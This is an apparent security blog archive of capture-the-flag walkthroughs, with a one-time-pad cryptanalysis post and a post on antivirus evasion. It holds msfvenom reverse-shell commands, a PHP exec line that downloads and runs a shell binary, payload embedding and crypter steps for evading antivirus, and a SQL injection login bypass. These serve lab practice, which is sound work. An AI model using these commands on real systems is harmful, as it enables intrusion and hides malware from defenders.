Thursday, 26 October 2017

Zico 2 challenge

Hello all,

Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea?

Let's try to verify it.

The first of all, we should scan our target

I had to scan only 100 top ports, because scanning all ports consume a lot of time.

As always let's begin pentest from web application.

OK, let's enumerate it using dirb.

/dbadmin/ looks very interesting... Look at it deeper.

Let's click on the test_db.php

Hmmm, password... We don't know any password. But, we can see phpLiteAdmin v1.9.3, as far as I know, this version is vulnerable to PHP Code Injection.

Excellent, let's try also guess the password to admin panel.
Yes! admin is a valid password.

Great! Now, we can use our exploit.
We have created new database named hack.php.
The database hack.php contains only one table, with one record. The record is as follow <?php phpinfo(); ?>, and now let's execute it.

Great! We did PoC. Now, let's edit record from PoC to reverse shell.
I was trying upload and execute PHP reverse shell, but without success. S, maybe let's try play with ELF file.
We have to upload php file first and the file will be responsible for wget ELF file into server, then we will be able to execute the ELF file.

Generated payload
msfvenom -a x86 -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=53 -f elf -o shell
 Record in table
<?php exec("cd /tmp; wget; chmod a+x shell; ./shell"); ?>

So, now we have to execute Metasploit meterpreter

Excellent, we have got limited shell.
In /home/zico/wordpress directory I have found wp-config.php file, which contains db password for zico user. Let's try use it to change permission from www-data user to zico user.


Monday, 31 July 2017

Taking advantage of one-time pad key reuse

Today we will have pleasure play with cryptoanalysis of One-Time Pad.

We have following scenario:
Someone was using the same key for several different messages. We were able to capture these ciphertexts and we we want to decrypt them.
We know that sender was very lazy and used the same key for each messages.

We know that:
c_i = m_i XOR k
c_i - cipher text
m_i - message in plaintext
k - key which has been used to encrypt messages (every time the same)

Captured ciphertexts:

ciphertext #1:
ciphertext #2:
ciphertext #3:
ciphertext #4:
ciphertext #5:
ciphertext #6:
ciphertext #7:
ciphertext #8:
ciphertext #9:
ciphertext #10:
We know how XOR works, and we should exploit the knowledge
c_i XOR c_j = m_i XOR m_j XOR k XOR k = m_i XOR m_j
 So, if we guess some part of message (for example i) then we should get a part of plain text comes from message j - becuase:
m_i XOR m_i XOR m_j = m_j
The most popular word in English are for example: The, he, ing, etc.
Let's write a short script to decrypt the messages

First version of the script

We have done final code as below

Now we are able to guess each of the messages.

m_1 = we can factor the number 15 with quantum computers. We can also factor the number 15 with a dog trained to bark three times - Robert Harley
m_2 = Euler would probably enjoy that now his theorem becomes a corner stone of crypto - Annonymous on Euler's theorem
m_3 = The nice thing about Keeyloq is now we cryptographers can drive a lot of fancy cars - Dan Boneh
m_4 = The ciphertext produced by a weak encryption algorithm looks as good as ciphertext produced by a strong encryption algorithm - Philip Zimmermann
m_5 = You don't want to buy a set of car keys from a guy who specializes in stealing cars - Marc Rotenberg commenting on Clipper
m_6 = There are two types of cryptography - that which will keep secrets safe from your little sister, and that which will keep secrets safe from your government - Bruce Schneier
m_7 = There are two types of cyptography: one that allows the Government to use brute force to break the code, and one that requires the Government to use brute force to break you
m_8 = We can see the point where the chip is unhappy if a wrong bit is sent and consumes more power from the environment - Adi Shamir
m_9 = A (private-key) encryption scheme states 3 algorithms, namely a procedure for generating keys, a procedure for encrypting, and a procedure for decrypting.?
m_10 = The Concise OxfordDictionary (2006) defines crypto as the art of writing o r solving codes.
goal = The secret message is: When using a stream cipher, never use the key more than once

Thursday, 25 May 2017


Hello guys,
I would like to apologize that I didn't write any posts for a long time, but I have a very good excuse - I was working on my OSWP :-)

Monday, 27 March 2017

Sedna challenge


Today I want to show you a Sedna hackfest walkthrough.


There are a lot of open ports. I was trying play with Samba, but there is nothing interesting except version - 4.6.1 (I didn't find valid exploit for this version of Samba).
I was trying browse port 8080, but to manager's panel I need to know valid web based authentication credentials. Default credentials such as: admin:admin and tomcat:tomcat don't work.

So, I decided to browse 80 port.

OK, let's run DirBuster to find the web application directories structure.

Hmmm, unfortunately I didn't find entry point to hack the target.
So, because I didn't have some interesting idea I decided to run nikto vulnerability scanner and it found license.txt file, which may be interesting...

Running /license.txt I found something juicy.

This page provided us to information that web application utilizes BuilderEngine. I was looking for valid exploit and BINGO!
We are able to use - "BuilderEngine 3.5.0 - Arbitrary File Upload".
I have executed URL from exploit

I have created new file named exploit.html which contains part of content of our exploit.

I have run apache server and execute our exploit. So I have uploaded PHP Reverse Shell file named shell.php.
Now, we have to find our backdoor.

Excellent! Our shell is uploaded, now let's execute it.

Great! We have got limited shell!


Tuesday, 21 March 2017

Pluck challenge


Let's start the challenge.

Nmap scanning

OK, we discovered four open ports. Let's begin, as always, from web application.

So, let's penetrate the web application deeper. We can see also that on the dashboard is link to admin panel.

Good, we discovered LFI. We can see very interesting information from /etc/passwd. I mean
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/
Let's try display content of the file.

We know that out target hosts TFTP service and if we could connect to the TFTP we will be able to (probably) download /backups/backup.tar file.

Excellent! Let's examine what is backup.tar file.

Wow, as far as I know the file is a backup of /var/www/html/* and /home/* files! In particular in /home/* we will be able to find some SSH keys.

Awesome! Using id_key4, we have got following screen

Editting, via Edit file, /home/paul/keys/, we are able to connect to paul's shell using vim trick - :set shell=/bin/bash and :shell.

Excellent! We have got limited shell! We can see that Linux Kernel is 4.8 and we can find valid local privileges explioit.

Very good! We are root!

Game over

Monday, 20 March 2017

hackfest2016: Quaoar

Hello everyone!

Today I would like to present to you the hackfest2016 Quaoar walkthrough :)

Nmap scanning

Wow, there is bunch of open ports.

I started from Samba enumeration, but I didn't find something interesting except information about samba version (3.6.3).

So I decided to try find something within the web application.

Dirbuster found some helpful (?) paths.

Now, we know that the web application utilizes a wordpress CMS. So, if we can know username from posts on the websites, we will be able to use wpscan to try bruteforce this user's password.

After admin:admin attemption - success!

Excellent! Let's try edit some plugin or something like that and upload reverse php shell..
I had edited existing Plugin - Aksimet and I activaed it.
I executed appropriate path to run our uploaded webshell.

Amazing, we have got limited shell. Now, we have to escalate our privileges.
I went to /var/www/wordpress and I found there config file.

Great! We have valid MySQL credentials. So, let's exploit it.
Hmmm rootpassword! maybe will be also valid for Linux root?

Game over!

Friday, 10 March 2017

VirusTotal challenge

Hello everyone,

Today I would like to present several methods of antivirus mechanisms evasion.

Within this article I will use couple tools such as: metasploit, shellter, veil-evasion.

Conclusion of the article will be comparison of efficiency generated payloads.

1. Metasploit Framework
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -o shell_reverse.exe
 I think that it is so potty result - 43/59 AV verified that our paylaod is malicious.

Let's try generate the same payload but with encoding
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
 The same potty result.

Now, let's try inject our malicious payload into other program.
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
 Better, but still it isn't suit us.

  • cp shell_reverse_msf_encoded_embedded.exe backdoor.exe
    cp /usr/share/windows-binaries/ .
    cd Hyperion-1.0/
    i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
    cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
    cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
    wine hyperion.exe ../backdoor.exe ../crypted.exe

 Hmmm, still to high detection ratio.

2. Veil-evasion
Veil evasion is a very useful tool which is compatible with metasploit payloads.

Let's lists payloads

Good, let's use for example payload 35.
 Quite nice! Detection ratio is lower than 50%.

3. Shellter
Shellter is the most effective tool to bypass AV detection. Shellter utilize no-malcious program such as putty.exe and incject malicious instruction.

We can use A (automation) mode. Next we have to set PE target - file which we will inject.
 Great! For me detection ratio is very low, isn't it?

As we can see shellter is very effective tool to AV evasion.


Monday, 13 February 2017

DC146:2016 dick dastardly


Now it is turn to dick dastardly challenge!

Scanning all ports...

Enumerating web pages

Excellent! The dirb scanner found several interesting files on our target.
The admin.php redirect us to index.php

Very interesting. Filling in username as admin and password as ' OR 1=1 -- - we have got following result

Nice! Now we are able to use sqlmap and try to find valid credentials.

Good, let's enumerate deeper! Unfortunately we are not able to retrieve databases names. So, we have to look for other opportunity to get these names.

Excellent! We found second vulnerable parameter. Let's enumerate databases

Very good, let's examine vulnhub database.
Database: vulnhub
Table: admins
[1 entry]
| id | pass                                 | user   |
| 1  | 1b37y0uc4n76u3557h15p455w0rd,5uck3rz | rasta  |
It is not SSH valid password for rasta username :( I don't know for what is the password.
After clicking on add IP to IRC whitelist I performed nmap scanning again and I have got very interesting result

Very good! I installed irssi on my attacker machine and I connected to our target IRC.